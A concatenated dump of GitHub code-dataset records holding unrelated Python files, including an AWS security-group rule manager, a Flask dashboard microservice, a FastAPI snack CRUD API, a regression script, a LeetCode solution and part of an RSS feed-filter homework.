ray.shutdown()\n","repo_name":"liuhanyao98/nums_gpu_draft","sub_path":"nums/experimental/benchmark_mlp_data.py","file_name":"benchmark_mlp_data.py","file_ext":"py","file_size_in_byte":12025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"20520220729","text":"\"\"\"Log utils\"\"\"\nimport sys\nimport logging\nfrom datetime import datetime\nfrom typing import Union, Optional\nfrom pathlib import Path\n\nLOG_FORMAT = \"%(asctime)-15s %(levelname)-5s %(name)-15s - %(message)s\"\n\n\ndef setup_logger(log_path: Union[str, Path],\n log_level: logging,\n fmt: Optional[str] = LOG_FORMAT):\n \"\"\"Setup for a logger instance.\n Args:\n log_path: full path\n log_level:\n fmt: message format\n \"\"\"\n logger = logging.getLogger()\n fmt = logging.Formatter(fmt=fmt)\n stream_handler = logging.StreamHandler()\n stream_handler.setFormatter(fmt)\n logger.addHandler(stream_handler)\n\n logger.setLevel(log_level)\n logger.handlers = []\n stdout_handler = logging.StreamHandler(sys.stdout)\n stdout_handler.setFormatter(fmt)\n logger.addHandler(stdout_handler)\n\n log_path = Path(log_path)\n directory = log_path.parent\n directory.mkdir(exist_ok=True)\n file_handler = logging.FileHandler(str(log_path))\n file_handler.setFormatter(fmt)\n logger.addHandler(file_handler)\n logger.info(\"Log at {}\".format(log_path))\n\n\ndef log_name(name: str) -> str:\n \"\"\"Generate log name\"\"\"\n timestamp = datetime.now().strftime(\"%Y-%m-%dT%H:%M:%S\")\n return \"{}_{}.log\".format(name, timestamp)\n","repo_name":"jackonelli/werner_prob","sub_path":"src/utils/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":1285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"14868595291","text":"import time\nfrom datetime import datetime, timedelta\n\nfrom dateutil import parser\n\nimport args\nimport helper\nimport json\n\n\nclass SecGroup:\n\n def __init__(self, **kwargs):\n self.rules = [SecGroupRule(rule) for rule in kwargs.get('rules', [])]\n self.aws_client = kwargs.get('aws_client', None)\n self.aws_group_dict = kwargs.get('aws_group_dict', {})\n\n self.__aws_rule = None\n\n @property\n def aws_group_id(self):\n return self.aws_group_dict.get('GroupId')\n\n @property\n def aws_ingress_rules(self):\n if not self.__aws_rule:\n ip_permissions = self.aws_group_dict.get('IpPermissions', [])\n self.__aws_rule = list(\n map(lambda fr: SecGroupRule(\n type='ingress', # TODO support type 'egress' also\n from_port=int(fr['FromPort']),\n to_port=int(fr['ToPort']),\n protocol=fr['IpProtocol'],\n ip_ranges=fr['IpRanges'],\n origin=fr\n ), ip_permissions)\n )\n return self.__aws_rule\n\n @property\n def ingress_rules(self):\n return list(filter(lambda r: r.is_ingress(), self.rules))\n\n def __prepare_aws_args(self, **kwargs):\n expire = kwargs.get('expire', None)\n\n ip_ranges = kwargs.get('ip_ranges', [])\n if args.arguments.cidr_ip is not None:\n ip_ranges.append(\n {'CidrIp': args.arguments.cidr_ip} if expire is None\n else {\n 'CidrIp': args.arguments.cidr_ip,\n 'Description': args.Arguments.EXPIRED_AT % f'{expire.isoformat()}{time.strftime(\"%z\")}'\n }\n )\n\n rules = kwargs.get('rules', self.rules)\n ip_permissions = [{\n 'IpRanges': ip_ranges if ip_ranges else rule.ip_ranges,\n 'FromPort': int(rule.from_port),\n 'ToPort': int(rule.to_port),\n 'IpProtocol': rule.protocol\n } for rule in rules]\n\n aws_args = {'GroupId': self.aws_group_id, 'IpPermissions': ip_permissions} if ip_permissions else None\n args.arguments.logger.debug(f\"Arguments send to aws: {aws_args}\")\n return aws_args\n\n def authorize(self):\n now = datetime.now()\n expire = now + timedelta(days=0, seconds=args.arguments.time_to_expire)\n\n rules = self.ingress_rules\n for rule1 in self.ingress_rules:\n for rule2 in self.aws_ingress_rules:\n if not rule1.merge(rule2):\n rules.append(rule2)\n args.arguments.logger.debug(f\"authorize_rules: {rules}\")\n\n self.__retry(\n fn_retries=[\n lambda _, aws_args: self.aws_client.authorize_security_group_ingress(**aws_args),\n lambda _, aws_args: self.aws_client.update_security_group_rule_descriptions_ingress(**aws_args)\n ],\n expire=expire,\n rules=set(rules)\n )\n args.arguments.logger.info(f\"Group {self.aws_group_id} authorized, error: {self.error_rules}\")\n\n def __retry(self, **kwargs):\n fn_retries = kwargs.get('fn_retries')\n error, ips = None, self.__prepare_aws_args(**kwargs)\n\n args.arguments.logger.debug(f\"Do action for group {self.aws_group_id} all rules in once call\")\n\n for fn_retry in fn_retries:\n error = helper.get_catch(\n fn=lambda: fn_retry(error, ips),\n ignore_error=False,\n ignore_result=True\n ) if ips else None\n if not error: break\n\n if not error:\n args.arguments.logger.info(f\"Group {self.aws_group_id} is done\")\n return\n\n args.arguments.logger.debug(\n f\"Error: {str(error)} => try do action for group {self.aws_group_id} one by one rule\")\n\n # we have an error then retry one-by-one\n rules, retry_once = kwargs.get('rules', []), kwargs.get('retry_once', True)\n if len(rules) == 1:\n rules[0].error = str(error)\n elif retry_once:\n for rule in rules:\n kwargs['retry_once'], kwargs['rules'] = False, [rule]\n self.__retry(**kwargs)\n args.arguments.logger.info(f\"Group {self.aws_group_id} is done\")\n else:\n for rule in rules: rule.error = str(error)\n\n @property\n def error_rules(self):\n return list(filter(lambda r: r.error, self.rules))\n\n def revoke(self):\n self.__revoke(revoke_rules=self.ingress_rules)\n args.arguments.logger.info(f\"Group {self.aws_group_id} revoked, error: {self.error_rules}\")\n\n def __revoke(self, revoke_rules):\n args.arguments.logger.debug(f\"revoke_rules: {revoke_rules}\")\n self.__retry(\n fn_retries=[lambda _, ips: self.aws_client.revoke_security_group_ingress(**ips)],\n rules=revoke_rules if revoke_rules else self.ingress_rules\n )\n\n def clear(self):\n now = datetime.now()\n revoke_rules = []\n for rule1 in self.aws_ingress_rules:\n args.arguments.logger.debug(f\"rule1: {rule1}\")\n for rule2 in self.ingress_rules:\n if not rule1.has_same_ports(rule2):\n continue\n rule1.ip_ranges = rule1.expired_ips(now)\n if rule1.ip_ranges:\n revoke_rules.append(rule1)\n\n args.arguments.logger.debug(f\"revoke_rules: {revoke_rules}\")\n if revoke_rules:\n self.__revoke(revoke_rules=revoke_rules)\n args.arguments.logger.info(f\"Group {self.aws_group_id} {'cleared' if revoke_rules else 'has no rule to clear'}, error: {self.error_rules}\")\n\n\nclass SecGroupRule():\n\n def __init__(self, iterable=(), **kwargs):\n self.type = None\n self.protocol = None\n self.to_port = None\n self.from_port = None\n self.ip_ranges = []\n\n self.__dict__.update(iterable, **kwargs)\n self.error = None\n\n def __eq__(self, other):\n if isinstance(self, other.__class__):\n return str(self) == str(other)\n return False\n\n def __hash__(self) -> int:\n return str(self).__hash__()\n\n def __str__(self) -> str:\n return json.dumps({\n \"from_port\": self.from_port,\n \"to_port\": self.to_port,\n \"protocol\": self.protocol,\n \"type\": self.type,\n \"ip_ranges\": [{\n \"CidrIp\": ipr[\"CidrIp\"],\n \"Description\": ipr[\"Description\"]\n } for ipr in self.ip_ranges]\n })\n\n def has_same_ports(self, other):\n for p in ['type', 'from_port', 'to_port', 'protocol']:\n if str(getattr(self, p, \"v2\")) != str(getattr(other, p, \"v1\")):\n return False\n return True\n\n def merge(self, other):\n if self.has_same_ports(other):\n return False\n\n other_iprs = []\n for ipr1 in self.ip_ranges:\n for ipr2 in other.ip_ranges:\n if ipr1[\"CidrIp\"] == ipr2[\"CidrIp\"]:\n ipr1[\"Description\"] = ipr2[\"Description\"]\n else:\n other_iprs.append(ipr2)\n self.ip_ranges += other_iprs\n return True\n\n def expired_ips(self, now):\n expired_ips = []\n expired_term = args.Arguments.EXPIRED_AT % \"\"\n for ipr in self.ip_ranges:\n desc = ipr.get('Description', '')\n if not desc: continue\n try:\n expired_time = parser.parse(desc[desc.startswith(expired_term) and len(expired_term):])\n if now.timestamp() >= expired_time.timestamp():\n expired_ips.append(ipr)\n except ValueError as e:\n args.arguments.logger.debug(f\"Ignore error {e}\")\n args.arguments.logger.debug(f\"Rule: {self} has expired_ips: {expired_ips}\")\n return expired_ips\n\n def is_ingress(self):\n return getattr(self, 'type') == 'ingress'\n\n def is_egress(self):\n return getattr(self, 'type') == 'egress'\n","repo_name":"riboseinc/terraform-aws-authenticating-secgroup","sub_path":"modules/python/src/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":8028,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"81"} +{"seq_id":"73918696266","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\nfrom sklearn.datasets import make_regression\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom Librairie_version16062020 import*\nimport argparse\nimport functools\nimport random\nimport scipy.stats\nfrom sklearn.linear_model import LinearRegression\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--fich', metavar='L', type=str, nargs='+',\n help='le dataset') \nparser.add_argument('--na', metavar='N', type=str, nargs='+',\n help='gestion na')\nparser.add_argument('--target', metavar='T', type=str, nargs='+',\n help='target attribut')\nparser.add_argument('--sep', metavar='L', type=str, nargs='+',\n help='le séparateur')\nparser.add_argument('--att', nargs='+', type=str)\n\n \nargs = parser.parse_args()\n\nfich=tuple(args.fich)[0]\n\nse=tuple(args.sep)[0]\n\nif (se==\"space\"):\n\tdata = pd.read_csv('/home/ali/stage/public/regression_multiple/datasets/'+fich,sep ='\\s+')\nelif (se==\"tab\"):\n\tdata = pd.read_csv('/home/ali/stage/public/regression_multiple/datasets/'+fich,sep ='\\t')\nelif (se==\"comma\"):\n\tdata = pd.read_csv('/home/ali/stage/public/regression_multiple/datasets/'+fich,sep =',')\nelif (se==\"semicolon\"):\n\tdata = pd.read_csv('/home/ali/stage/public/regression_multiple/datasets/'+fich,sep =';')\nelse:\n\tdata = pd.read_csv('/home/ali/stage/public/regression_multiple/datasets/'+fich,sep =':')\n\nval = []\n\nfor att in tuple(args.att):\n\tval.append(att[:-1])\n\nprint(val)\n\nfichier3 = open(\"xindex.txt\",\"w\")\nfichier = open(\"tmp_reg2.txt\",\"r\")\nnumb_att = fichier.readline()\ngestion_na = fichier.readline()\nfichier3.write(str(len(val))+\"\\n\") \n\ncol = []\nfor i in range (int(numb_att)):\n\ta=fichier.readline()\n\ta=a[:-1]\n\tcol.append(a)\t\n\n\n# Choix des attributs pertinants\ndata = data[col]\n\n\n# Gestion des valeurs manquantes\nif(gestion_na[:-1]==\"remplacer\"):\n for col in data.columns: \n data[col]=data[col].fillna(value=data[col].mean())\nelse:\n data = data.dropna(axis=0)\n\n\ny = data[tuple(args.target)[0][:-1]]\n\nX = data.drop([tuple(args.target)[0][:-1]],axis=1)\n\n# Indices des attributs pour les figures\nind = []\nfor i in range (len(X.columns)):\n\tif (X.columns[i] in val):\n\t\tind.append(i)\n\t\tfichier3.write(str(i)+\"\\n\") \n\nprint(ind)\n\ny = np.array(y)\ny=y.reshape(y.shape[0], 1)\n\nx=np.array(X).reshape(y.shape[0],int(numb_att)-1)\n\nM = np.hstack((np.ones(y.shape),x))\n\ntheta = np.random.randn(int(numb_att), 1)\n\ndef model(X, theta):\n return X.dot(theta)\n\n\nt1= np.transpose(M).dot(M)\nt2= np.transpose(y).dot(M)\nt3= np.linalg.inv(t1)\ntheta_final=t3.dot(np.transpose(t2))\n\n# création d'un vecteur prédictions qui contient les prédictions de notre modele final\npredictions = model(M, theta_final)\n\n\nexpr='Y='+str(round(theta_final[0][0],2));\n\nfor j in range (len(X.columns)):\n\texpr=expr+'+'+str(round(theta_final[len(X.columns)-1-j][0],4))+'X_{'+X.columns[j]+'}'\n\ndef droite(x):\n return theta_final[0]+theta_final[1]*x\n\n# Affiche les résultats de prédictions (en rouge) par rapport a notre Dataset (en bleu)\nfor j in range(len(val)):\n\tfig=plt.figure()\n\tplt.scatter(x[:,ind[j]],y)\n\tplt.scatter(x[:,ind[j]], predictions, c='r')\n\tplt.ylabel(tuple(args.target)[0][:-1])\n\tplt.xlabel(val[j][:-1])\n\tfig.suptitle(expr)\n\tfig.savefig(\"modele\"+str(j)+\".png\")\n\tplt.close()\n\nmodel2 = LinearRegression()\nmodel2.fit(x,y)\nmodel2.score(x,y)\npredictions = model2.predict(x)\n\n","repo_name":"AliElMahouli/Stage1A","sub_path":"public/regression_multiple/regression3.py","file_name":"regression3.py","file_ext":"py","file_size_in_byte":3459,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"25131972774","text":"import logging.config\nimport os\nimport sys\n\nimport requests\nfrom autologging import traced, logged\nfrom flask import Flask, request\nfrom flask import jsonify, make_response\nfrom flask import url_for\nfrom flask_consulate import Consul as Consulate\nfrom flask_jwt_extended import JWTManager, jwt_required\nfrom flask_prometheus_metrics import register_metrics\nfrom flask_restx import Api\nfrom flask_restx import fields, Resource\nfrom flask_zipkin import Zipkin\nfrom prometheus_client import make_wsgi_app\nfrom werkzeug.middleware.dispatcher import DispatcherMiddleware\nfrom werkzeug.serving import run_simple\n\napp = Flask(__name__)\napp.config.from_envvar('ENV_FILE_LOCATION')\napp.debug = app.config['DEBUG']\n\nfor v in os.environ:\n env = os.getenv(v)\n if v == 'SERVER_PORT':\n env = int(env)\n app.config[v] = env\n\njwt = JWTManager(app)\n\nlog = logging.getLogger(__name__)\n\nlogging.basicConfig(\n format=\"%(levelname)s [%(name)s %(funcName)s] %(message)s\",\n level=app.config['LOG_LEVEL'],\n stream=sys.stdout\n)\n\n\nclass CustomApi(Api):\n @property\n def specs_url(self):\n \"\"\"\n The Swagger specifications absolute url (ie. `swagger.json`)\n\n :rtype: str\n \"\"\"\n return url_for(self.endpoint('specs'), _external=False)\n\n\nauthorizations = {\n 'apikey': {\n 'type': 'apiKey',\n 'in': 'header',\n 'name': 'Authorization'\n }\n}\n\n\ndef initialize_api(app):\n return CustomApi(app=app, catch_all_404s=True, version='1.0', title='API - Products Service',\n description='Products Management', doc='/swagger-ui.html',\n default_label='products endpoints', default='products',\n authorizations=authorizations, security='apikey')\n\n\napi = initialize_api(app)\n\nns = api.namespace('api/dashboard', description='Dashboard operations')\n\ncategoryModel = api.model('DashboardTotalByCategory', {\n 'category': fields.String(required=True, description='Category Name'),\n 'total': fields.Integer(required=True, description='Total')\n})\n\ntodoModel = api.model('Todo', {\n 'name': fields.String(required=True, description='Name'),\n 'createdDate': fields.DateTime(required=True, description='Created Date'),\n 'plannedEndDate': fields.DateTime(required=True, description='Planned Date'),\n 'done': fields.Boolean(required=True, description='Done?')\n})\n\n\n@traced(log)\n@logged(log)\n@ns.route('/totalCategory')\nclass DashboardCategoryApi(Resource):\n \"\"\"Return list of categories\"\"\"\n\n @jwt_required\n @ns.doc(description='List of categories',\n params={'categoryName': 'Category Name', 'personId': 'Person Id', 'plannedEndDate': 'Planned Date',\n 'done': 'Todo done?'},\n responses={\n 400: 'Validation Error',\n 401: 'Unauthorized',\n 403: 'Forbidden',\n 500: 'Unexpected Error'\n })\n @api.response(200, 'Success', [categoryModel])\n def get(self):\n token = request.headers.get('Authorization')\n category_name = request.args.get('categoryName')\n person_id = request.args.get('personId')\n planned_end_date = request.args.get('plannedEndDate')\n done = request.args.get('done')\n log.debug('Token: %s', token)\n url = app.config['TODO_URL']\n query_param = '?'\n if category_name is not None:\n query_param += '&categoryName=' + category_name\n if person_id is not None:\n query_param += '&personId=' + person_id\n if planned_end_date is not None:\n query_param += '&plannedEndDate=' + planned_end_date\n if done is not None:\n query_param += '&done=' + done\n\n if query_param != '?':\n url += query_param\n r = requests.get(url, headers={'Content-Type': 'application/json',\n 'Authorization': token})\n json = r.json()\n if r.status_code == 200:\n array = []\n for key in json:\n array.append({'category': key, 'total': len(json[key])})\n json = jsonify(array)\n\n return make_response(json, r.status_code)\n\n\n@app.errorhandler(Exception)\ndef handle_root_exception(error):\n \"\"\"Return a custom message and 400 or 500 status code\"\"\"\n log.exception(error)\n if hasattr(error, 'errors'):\n return make_response(jsonify(error=str(error.errors)), 400)\n return make_response(jsonify(error=str(error)), 500)\n\n\n@app.route('/actuator/health')\ndef health():\n return jsonify({'status': 'OK'})\n\n\nserver_port = app.config['SERVER_PORT']\n\n\n@app.route('/actuator/info')\ndef actuator_info():\n return jsonify({})\n\n\n@app.route('/actuator')\ndef actuator_index():\n port = server_port\n actuator = {\n \"_links\": {\n \"self\": {\n \"href\": \"http://localhost:\" + str(port) + \"/actuator\",\n \"templated\": False\n },\n \"health\": {\n \"href\": \"http://localhost:\" + str(port) + \"/actuator/health\",\n \"templated\": False\n },\n \"info\": {\n \"href\": \"http://localhost:\" + str(port) + \"/actuator/info\",\n \"templated\": False\n },\n \"prometheus\": {\n \"href\": \"http://localhost:\" + str(port) + \"/actuator/prometheus\",\n \"templated\": False\n },\n \"metrics\": {\n \"href\": \"http://localhost:\" + str(port) + \"/actuator/metrics\",\n \"templated\": False\n }\n }\n }\n return jsonify(actuator)\n\n\nzipkin = Zipkin(sample_rate=int(app.config['ZIPKIN_RATIO']))\nzipkin.init_app(app)\n\napi.add_namespace(ns)\ndebug_flag = app.config['DEBUG']\n\n\ndef initialize_dispatcher(app):\n initialize_consul(app)\n\n # Plug metrics WSGI app to your main app with dispatcher\n return DispatcherMiddleware(app.wsgi_app, {\"/actuator/prometheus\": make_wsgi_app()})\n\n\ndef initialize_consul(app):\n app_name = app.config['APP_NAME']\n # Consul\n # This extension should be the first one if enabled:\n consul = Consulate(app=app)\n # Fetch the conviguration:\n consul.apply_remote_config(namespace='config/'+app_name+'/data')\n # Register Consul service:\n consul.register_service(\n name=app_name,\n interval='10s',\n tags=['webserver', ],\n port=server_port,\n httpcheck='http://localhost:' + str(server_port) + '/actuator/health'\n )\n\n public_key_location = app.config['JWT_PUBLIC_KEY']\n\n log.debug('public_key_location: %s', public_key_location)\n\n app.config['JWT_PUBLIC_KEY'] = open(app.config['JWT_PUBLIC_KEY'], \"r\").read()\n\n log.debug('Config environment: %s', app.config)\n\n # provide app's version and deploy environment/config name to set a gauge metric\n register_metrics(app, app_version=\"v0.1.2\", app_config=\"staging\")\n\n\nif __name__ == \"__main__\":\n run_simple(hostname=\"0.0.0.0\", port=server_port, application=initialize_dispatcher(app), use_debugger=debug_flag)\n","repo_name":"rodrigorodrigues/microservices-with-istio-service-mesh","sub_path":"aggregator-service/flask/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7036,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"81"} +{"seq_id":"37184630757","text":"from fastapi import HTTPException, APIRouter, Depends, Cookie\nfrom pydantic import BaseModel\nfrom typing import List, Any\nimport mysql.connector\n\nfrom api.config import SNACKVIDIA_CONFIG\nfrom api.auth import decode_access_token, verify_token\n\nrouter = APIRouter()\n\n# Model for data in the snack table\nclass Snack(BaseModel):\n nama_snack: Any\n deskripsi: Any\n rating: Any\n asal_daerah: Any\n harga: Any\n link_gambar: Any\n nutrition: Any\n recipe: Any\n\ndef get_db_connection():\n return mysql.connector.connect(**SNACKVIDIA_CONFIG)\n\nasync def get_current_user(token: str = Depends(verify_token)):\n return token\n\n# Integration to MySQL databases\nmydb = get_db_connection()\nmycursor = mydb.cursor()\n\n# Endpoint to get all snack data\n@router.get(\"/snackvidia\", response_model=List[Snack])\ndef get_snacks(current_user: dict = Depends(get_current_user)):\n mycursor.execute(\"SELECT * FROM datasnackvidia\")\n result = mycursor.fetchall()\n snacks = []\n if len(result) == 0:\n return {\"message\": \"No Snack Data\"}\n for row in result:\n objekSnack = Snack(nama_snack=row[0], deskripsi=row[1], rating=row[2], asal_daerah=row[3], harga=row[4], link_gambar=row[5], nutrition=row[6], recipe=row[7])\n snacks.append(objekSnack)\n return snacks\n\n# Endpoint to get snack data based on snack name\n@router.get(\"/snackvidia/{nama_snack}\", response_model=Snack)\ndef get_snack(nama_snack: str, current_user: dict = Depends(get_current_user)):\n mycursor.execute(\"SELECT * FROM datasnackvidia WHERE nama_snack = %s\", (nama_snack,))\n result = mycursor.fetchone()\n if result:\n objekSnack = Snack(nama_snack=result[0], deskripsi=result[1], rating=result[2], asal_daerah=result[3], harga=result[4], link_gambar=result[5], nutrition=result[6], recipe=result[7])\n return objekSnack\n else:\n raise HTTPException(status_code=404, detail=\"Snack not found\")\n\n# Endpoint to add new snack data\n@router.post(\"/snackvidia\", response_model=Snack)\ndef add_snack(objekSnack: Snack, current_user: dict = Depends(get_current_user)):\n try:\n query = \"INSERT INTO datasnackvidia (nama_snack, deskripsi, rating, asal_daerah, harga) VALUES (%s, %s, %s, %s, %s)\"\n values = (objekSnack.nama_snack, objekSnack.deskripsi, objekSnack.rating, objekSnack.asal_daerah, objekSnack.harga)\n mycursor.execute(query, values)\n mydb.commit()\n return objekSnack\n except Exception as e:\n raise HTTPException(status_code=500, detail=\"Internal server error\")\n\n# Endpoint to modify snack data\n@router.put(\"/snackvidia/{nama_snack}\", response_model=Snack)\ndef update_snack(nama_snack: str, snack_data: Snack, current_user: dict = Depends(get_current_user)):\n query = \"UPDATE datasnackvidia SET nama_snack = %s, deskripsi = %s, rating = %s, asal_daerah = %s, harga = %s WHERE nama_snack = %s\"\n values = (snack_data.nama_snack, snack_data.deskripsi, snack_data.rating, snack_data.asal_daerah, snack_data.harga, nama_snack)\n mycursor.execute(query, values)\n if mycursor.rowcount == 0:\n raise HTTPException(status_code=404, detail=\"Snack not found\")\n mydb.commit()\n raise HTTPException(status_code=200, detail=\"Snack updated\")\n\n# Endpoint to delete snack data based on snack name\n@router.delete(\"/snackvidia/{nama_snack}\")\ndef delete_snack(nama_snack: str, current_user: dict = Depends(get_current_user)):\n query = \"DELETE FROM datasnackvidia WHERE nama_snack = %s\"\n values = (nama_snack,)\n mycursor.execute(query, values)\n if mycursor.rowcount == 0:\n raise HTTPException(status_code=404, detail=\"Snack not found\")\n mydb.commit()\n return {\"message\": \"Snack deleted\"}","repo_name":"Snacktify/capstone-api","sub_path":"api/snackvidia.py","file_name":"snackvidia.py","file_ext":"py","file_size_in_byte":3681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"32362566267","text":"#\n# @lc app=leetcode id=264 lang=python3\n#\n# [264] Ugly Number II\n#\n# https://leetcode.com/problems/ugly-number-ii/description/\n#\n# algorithms\n# Medium (35.33%)\n# Total Accepted: 98.1K\n# Total Submissions: 274.9K\n# Testcase Example: '10'\n#\n# Write a program to find the n-th ugly number.\n#\n# Ugly numbers are positive numbers whose prime factors only include 2, 3, 5. \n#\n# Example:\n#\n#\n# Input: n = 10\n# Output: 12\n# Explanation: 1, 2, 3, 4, 5, 6, 8, 9, 10, 12 is the sequence of the first 10\n# ugly numbers.\n#\n# Note:  \n#\n#\n# 1 is typically treated as an ugly number.\n# n does not exceed 1690.\n#\n#\nfrom heapq import heappop, heappush\n\n\nclass Solution:\n def nthUglyNumber(self, n: int) -> int:\n if n == 1:\n return 1\n\n counter = 2\n numbers = []\n heappush(numbers, 2)\n heappush(numbers, 3)\n heappush(numbers, 5)\n seen = set([2, 3, 5])\n\n while True:\n ugly = heappop(numbers)\n if counter == n:\n return ugly\n counter += 1\n for c in (ugly*2, ugly*3, ugly*5):\n if c not in seen:\n seen.add(c)\n heappush(numbers, c)\n\n\ndef assert_eq(actual, expected):\n if actual != expected:\n raise AssertionError('expected: %s, actual: %s' % (expected, actual))\n\n\ndef test(input_, output):\n assert_eq(Solution().nthUglyNumber(input_), output)\n\n\nif __name__ == '__main__':\n test(1, 1)\n test(2, 2)\n test(3, 3)\n test(4, 4)\n test(5, 5)\n test(10, 12)\n","repo_name":"balta2ar/scratchpad","sub_path":"myleetcode/264_ugly_number_ii/264.ugly-number-ii.py","file_name":"264.ugly-number-ii.py","file_ext":"py","file_size_in_byte":1540,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"31073012545","text":"from unittest.mock import Mock, call\n\nfrom homework_02.cacher import cache\n\n\ndef test_cacher():\n mock = Mock()\n\n def f(a):\n ans = a ** 2\n return ans\n\n f_mock = mock(f)\n cached = cache(f_mock)\n\n cached(1)\n cached(1)\n cached(2)\n cached(3)\n cached(2)\n cached(2)\n\n actual_result = mock.mock_calls\n expected_result = [call(f), call()(1), call()(2), call()(3)]\n assert expected_result == actual_result\n\n\ndef test_cacher_values():\n @cache\n def f(c):\n ans = c ** 2\n return ans\n\n a = f(3)\n b = f(3)\n assert a == b\n","repo_name":"ParamonovED/Epam_HW","sub_path":"homework_02/tests/test_cacher.py","file_name":"test_cacher.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"35113599671","text":"\"\"\"\nSplashScreen.py\n\nNot finished. Will maybe be a splashscreen before the project starts.\n\nAuthor: Cyril Marx\nDate: 09.09.2021\n\"\"\"\n\nfrom src.GlobalLibraries import *\n\nclass SplashScreen:\n def __init__(self, network_manager, root):\n self.network_manager = network_manager\n self.root_frame = root\n splash_x = self.root_frame.winfo_width() // 2 - design.splash_width // 2\n splash_y = self.root_frame.winfo_height() // 2 - design.splash_height // 2\n self.splash = tk.Toplevel()\n self.splash.configure(background=design.grey_7[design.theme], highlightthickness=4,\n highlightbackground=design.grey_2[design.theme])\n self.splash.geometry(f\"{design.splash_width}x{design.splash_height}+{splash_x}+{splash_y}\")\n self.splash.overrideredirect(True)\n self.splash.grab_set()\n\n def close_splash_screen(self):\n self.splash.grab_release()\n self.splash.destroy()\n","repo_name":"Cycrus/COGNA_Editor","sub_path":"src/SpashScreen.py","file_name":"SpashScreen.py","file_ext":"py","file_size_in_byte":959,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"74965889543","text":"# 6.0001/6.00 Problem Set 5 - RSS Feed Filter\n# Name:\n# Collaborators:\n# Time:\n\nimport feedparser\nimport string\nimport time\nimport threading\nfrom project_util import translate_html\nfrom mtTkinter import *\nfrom datetime import datetime\nimport pytz\nimport os\n#-----------------------------------------------------------------------\n\n#======================\n# Code for retrieving and parsing\n# Google and Yahoo News feeds\n# Do not change this code\n#======================\n\ndef process(url):\n \"\"\"\n Fetches news items from the rss url and parses them.\n Returns a list of NewsStory-s.\n \"\"\"\n feed = feedparser.parse(url)\n entries = feed.entries\n ret = []\n for entry in entries:\n guid = entry.guid\n title = translate_html(entry.title)\n link = entry.link\n description = translate_html(entry.description)\n pubdate = translate_html(entry.published)\n\n try:\n pubdate = datetime.strptime(pubdate, \"%a, %d %b %Y %H:%M:%S %Z\")\n pubdate.replace(tzinfo=pytz.timezone(\"GMT\"))\n # pubdate = pubdate.astimezone(pytz.timezone('EST'))\n # pubdate.replace(tzinfo=None)\n except ValueError:\n pubdate = datetime.strptime(pubdate, \"%a, %d %b %Y %H:%M:%S %z\")\n\n newsStory = NewsStory(guid, title, description, link, pubdate)\n ret.append(newsStory)\n return ret\n\n#======================\n# Data structure design\n#======================\n\n# Problem 1\n\nclass NewsStory(object):\n\n def __init__(self, guid, title, description, link, pubdate):\n self.guid = guid\n self.title = title\n self.description = description\n self.link = link\n self.pubdate = pubdate\n \n def get_guid(self):\n return self.guid\n\n def get_title(self):\n return self.title\n\n def get_description(self):\n return self.description\n\n def get_link(self):\n return self.link\n\n def get_pubdate(self):\n return self.pubdate\n\n def constructor(self):\n '''\n Stores guid, title, description, link and pubdate of a feed into a dictionary for the later use\n Returns: feed dictionary \n - type: dict\n '''\n feed_dict = {}\n feed_dict['guid'] = self.get_guid\n feed_dict['title'] = self.get_title\n feed_dict['description'] = self.get_description\n feed_dict['link'] = self.get_link\n feed_dict['pubdate'] = self.get_pubdate\n\n return feed_dict\n\n\n#======================\n# Triggers\n#======================\n\nclass Trigger(object):\n def evaluate(self, story):\n \"\"\"\n Returns True if an alert should be generated\n for the given news item, or False otherwise.\n \"\"\"\n # DO NOT CHANGE THIS!\n raise NotImplementedError\n\n# PHRASE TRIGGERS\n\n# Problem 2\nclass PhaseTrigger(Trigger):\n def __init__(self, phase):\n self.phase = phase\n def is_phase_in(self, input_string):\n '''\n Takes in one string argument text, returns True if the whole phrase is presented in text, False other wise\n Return: True or False\n - type: Boolean val\n\n Requirement: \n - A pharse is one or more works sperated by a single space between words\n - The trigger will fire only when each word in the phrase is present in its \n entirety and appears consecutively in the text, sperated by spaces or punction\n - the trigger should not be case sensitive \n - split/replace/join methods will be certainly helpful\n '''\n lower_phase = self.phase.lower()\n phase_list = lower_phase.split(' ')\n print('CLEAN PHASE: ', phase_list)\n join_phase = ''.join(phase_list)\n lower_string = input_string.lower()\n exclude = list(string.punctuation)\n # nopunc_string = lower_string.replace(str([i for i in exclude]), ' ')\n # print('NO PUNC STRING: ', nopunc_string)\n clean_string = ''.join(charac if charac not in exclude else ' ' for charac in lower_string)\n string_list = clean_string.split(' ')\n print('CLEAN TEXT: ', string_list)\n join_text = ''.join(string_list)\n if set(phase_list).issubset(set(string_list)) and join_phase in join_text: \n print('True')\n return True\n else: \n print('False')\n return False \n \n\n\n \n\n\n# Problem 3\nclass TitleTrigger(PhaseTrigger):\n def __init__(self, phase):\n self.phase = phase\n\n def check_title(self, story):\n text = story.get_title()\n print('INPUT TEXT: ', text)\n return self.is_phase_in(text)\n def evaluate(self, story):\n return self.check_title(story)\n\n\n# Problem 4\nclass DescriptionTrigger(PhaseTrigger):\n def __init__(self, phase):\n self.phase = phase\n def check_description(self, story):\n descrip = story.get_description()\n return self.is_phase_in(descrip)\n def evaluate(self, story):\n return self.check_description(story)\n\n# TIME TRIGGERS\n\n# Problem 5\nclass TimeTrigger(Trigger):\n# Constructor:\n# Input: Time has to be in EST and in the format of \"%d %b %Y %H:%M:%S\".\n# Convert time from string to a datetime before saving it as an 